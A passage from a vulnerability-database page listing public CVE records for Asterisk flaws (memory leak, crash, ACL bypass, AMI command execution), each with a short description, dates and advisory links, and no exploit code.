      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2017-11-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. A memory leak occurs when an Asterisk pjsip session object is created and that call gets rejected before the session itself is fully established. When this happens the session object never gets destroyed. Eventually Asterisk can run out of memory and crash."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-11-25T10:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2017-011.html"
        },
        {
          "name": "101765",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/101765"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27345"
        },
        {
          "name": "GLSA-201811-11",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "https://security.gentoo.org/glsa/201811-11"
        },
        {
          "name": "DSA-4076",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2017/dsa-4076"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2017-16672",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in Asterisk Open Source 13 before 13.18.1, 14 before 14.7.1, and 15 before 15.1.1 and Certified Asterisk 13.13 before 13.13-cert7. A memory leak occurs when an Asterisk pjsip session object is created and that call gets rejected before the session itself is fully established. When this happens the session object never gets destroyed. Eventually Asterisk can run out of memory and crash."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.digium.com/pub/security/AST-2017-011.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2017-011.html"
            },
            {
              "name": "101765",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/101765"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-27345",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27345"
            },
            {
              "name": "GLSA-201811-11",
              "refsource": "GENTOO",
              "url": "https://security.gentoo.org/glsa/201811-11"
            },
            {
              "name": "DSA-4076",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2017/dsa-4076"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2017-16672",
    "datePublished": "2017-11-09T00:00:00",
    "dateReserved": "2017-11-08T00:00:00",
    "dateUpdated": "2024-08-05T20:35:19.786Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-2288

Vulnerability from cvelistv5

Published

2014-04-18 19:00

Modified

2024-08-06 10:06

Severity ?

Summary

The PJSIP channel driver in Asterisk Open Source 12.x before 12.1.1, when qualify_frequency "is enabled on an AOR and the remote SIP server challenges for authentication of the resulting OPTIONS request," allows remote attackers to cause a denial of service (crash) via a PJSIP endpoint that does not have an associated outgoing request.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-003.html	x_refsource_CONFIRM
	https://issues.asterisk.org/jira/browse/ASTERISK-23210	x_refsource_CONFIRM
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html	vendor-advisory, x_refsource_FEDORA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:06:00.194Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-003.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23210"
          },
          {
            "name": "FEDORA-2014-3762",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
          },
          {
            "name": "FEDORA-2014-3779",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-03-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The PJSIP channel driver in Asterisk Open Source 12.x before 12.1.1, when qualify_frequency \"is enabled on an AOR and the remote SIP server challenges for authentication of the resulting OPTIONS request,\" allows remote attackers to cause a denial of service (crash) via a PJSIP endpoint that does not have an associated outgoing request."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-04-18T18:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-003.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23210"
        },
        {
          "name": "FEDORA-2014-3762",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
        },
        {
          "name": "FEDORA-2014-3779",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2288",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The PJSIP channel driver in Asterisk Open Source 12.x before 12.1.1, when qualify_frequency \"is enabled on an AOR and the remote SIP server challenges for authentication of the resulting OPTIONS request,\" allows remote attackers to cause a denial of service (crash) via a PJSIP endpoint that does not have an associated outgoing request."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-003-12.diff"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-003.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-003.html"
            },
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-23210",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23210"
            },
            {
              "name": "FEDORA-2014-3762",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
            },
            {
              "name": "FEDORA-2014-3779",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-2288",
    "datePublished": "2014-04-18T19:00:00",
    "dateReserved": "2014-03-05T00:00:00",
    "dateUpdated": "2024-08-06T10:06:00.194Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-6610

Vulnerability from cvelistv5

Published

2014-11-26 15:00

Modified

2024-08-06 12:24

Severity ?

Summary

Asterisk Open Source 11.x before 11.12.1 and 12.x before 12.5.1 and Certified Asterisk 11.6 before 11.6-cert6, when using the res_fax_spandsp module, allows remote authenticated users to cause a denial of service (crash) via an out of call message, which is not properly handled in the ReceiveFax dialplan application.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-010.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T12:24:34.306Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-010.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-09-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 11.x before 11.12.1 and 12.x before 12.5.1 and Certified Asterisk 11.6 before 11.6-cert6, when using the res_fax_spandsp module, allows remote authenticated users to cause a denial of service (crash) via an out of call message, which is not properly handled in the ReceiveFax dialplan application."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-11-26T13:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-010.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-6610",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 11.x before 11.12.1 and 12.x before 12.5.1 and Certified Asterisk 11.6 before 11.6-cert6, when using the res_fax_spandsp module, allows remote authenticated users to cause a denial of service (crash) via an out of call message, which is not properly handled in the ReceiveFax dialplan application."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-010.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-010.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-6610",
    "datePublished": "2014-11-26T15:00:00",
    "dateReserved": "2014-09-18T00:00:00",
    "dateUpdated": "2024-08-06T12:24:34.306Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-8413

Vulnerability from cvelistv5

Published

2014-11-24 15:00

Modified

2024-08-06 13:18

Severity ?

Summary

The res_pjsip_acl module in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 does not properly create and load ACLs defined in pjsip.conf at startup, which allows remote attackers to bypass intended PJSIP ACL rules.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2014-013.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T13:18:48.273Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-013.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-11-20T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The res_pjsip_acl module in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 does not properly create and load ACLs defined in pjsip.conf at startup, which allows remote attackers to bypass intended PJSIP ACL rules."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-06T17:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-013.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-8413",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The res_pjsip_acl module in Asterisk Open Source 12.x before 12.7.1 and 13.x before 13.0.1 does not properly create and load ACLs defined in pjsip.conf at startup, which allows remote attackers to bypass intended PJSIP ACL rules."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-013.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-013.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-8413",
    "datePublished": "2014-11-24T15:00:00",
    "dateReserved": "2014-10-22T00:00:00",
    "dateUpdated": "2024-08-06T13:18:48.273Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-18610

Vulnerability from cvelistv5

Published

2019-11-22 17:31

Modified

2024-08-05 01:54

Severity ?

Summary

An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands.

References

▼	URL	Tags
	https://www.asterisk.org/downloads/security-advisories	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2019-007.html	x_refsource_MISC
	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	mailing-list, x_refsource_MLIST
	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	mailing-list, x_refsource_MLIST

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T01:54:14.490Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.asterisk.org/downloads/security-advisories"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
          },
          {
            "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
          },
          {
            "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-04-03T07:06:11",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.asterisk.org/downloads/security-advisories"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
        },
        {
          "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
        },
        {
          "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-18610",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.asterisk.org/downloads/security-advisories",
              "refsource": "MISC",
              "url": "https://www.asterisk.org/downloads/security-advisories"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2019-007.html",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
            },
            {
              "name": "[debian-lts-announce] 20191130 [SECURITY] [DLA 2017-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
            },
            {
              "name": "[debian-lts-announce] 20220403 [SECURITY] [DLA 2969-1] asterisk security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2019-18610",
    "datePublished": "2019-11-22T17:31:16",
    "dateReserved": "2019-10-29T00:00:00",
    "dateUpdated": "2024-08-05T01:54:14.490Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-0871

Vulnerability from cvelistv5

Published

2009-03-11 14:00

Modified

2024-08-07 04:48

Severity ?

Summary

The SIP channel driver in Asterisk Open Source 1.4.22, 1.4.23, and 1.4.23.1; 1.6.0 before 1.6.0.6; 1.6.1 before 1.6.1.0-rc2; and Asterisk Business Edition C.2.3, with the pedantic option enabled, allows remote authenticated users to cause a denial of service (crash) via a SIP INVITE request without any headers, which triggers a NULL pointer dereference in the (1) sip_uri_headers_cmp and (2) sip_uri_params_cmp functions.

References

▼	URL	Tags
	http://osvdb.org/52568	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/bid/34070	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id?1021834	vdb-entry, x_refsource_SECTRACK
	http://www.securityfocus.com/archive/1/501656/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://bugs.digium.com/view.php?id=14417	x_refsource_CONFIRM
	http://bugs.digium.com/view.php?id=13547	x_refsource_CONFIRM
	http://downloads.digium.com/pub/security/AST-2009-002.html	x_refsource_CONFIRM
	http://www.vupen.com/english/advisories/2009/0667	vdb-entry, x_refsource_VUPEN
	http://secunia.com/advisories/34229	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T04:48:52.606Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "52568",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/52568"
          },
          {
            "name": "34070",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/34070"
          },
          {
            "name": "1021834",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1021834"
          },
          {
            "name": "20090310 AST-2009-002: Remote Crash Vulnerability in SIP channel driver",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/501656/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://bugs.digium.com/view.php?id=14417"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://bugs.digium.com/view.php?id=13547"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2009-002.html"
          },
          {
            "name": "ADV-2009-0667",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/0667"
          },
          {
            "name": "34229",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/34229"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-03-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The SIP channel driver in Asterisk Open Source 1.4.22, 1.4.23, and 1.4.23.1; 1.6.0 before 1.6.0.6; 1.6.1 before 1.6.1.0-rc2; and Asterisk Business Edition C.2.3, with the pedantic option enabled, allows remote authenticated users to cause a denial of service (crash) via a SIP INVITE request without any headers, which triggers a NULL pointer dereference in the (1) sip_uri_headers_cmp and (2) sip_uri_params_cmp functions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "52568",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/52568"
        },
        {
          "name": "34070",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/34070"
        },
        {
          "name": "1021834",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1021834"
        },
        {
          "name": "20090310 AST-2009-002: Remote Crash Vulnerability in SIP channel driver",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/501656/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://bugs.digium.com/view.php?id=14417"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://bugs.digium.com/view.php?id=13547"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2009-002.html"
        },
        {
          "name": "ADV-2009-0667",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/0667"
        },
        {
          "name": "34229",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/34229"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-0871",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The SIP channel driver in Asterisk Open Source 1.4.22, 1.4.23, and 1.4.23.1; 1.6.0 before 1.6.0.6; 1.6.1 before 1.6.1.0-rc2; and Asterisk Business Edition C.2.3, with the pedantic option enabled, allows remote authenticated users to cause a denial of service (crash) via a SIP INVITE request without any headers, which triggers a NULL pointer dereference in the (1) sip_uri_headers_cmp and (2) sip_uri_params_cmp functions."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "52568",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/52568"
            },
            {
              "name": "34070",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/34070"
            },
            {
              "name": "1021834",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1021834"
            },
            {
              "name": "20090310 AST-2009-002: Remote Crash Vulnerability in SIP channel driver",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/501656/100/0/threaded"
            },
            {
              "name": "http://bugs.digium.com/view.php?id=14417",
              "refsource": "CONFIRM",
              "url": "http://bugs.digium.com/view.php?id=14417"
            },
            {
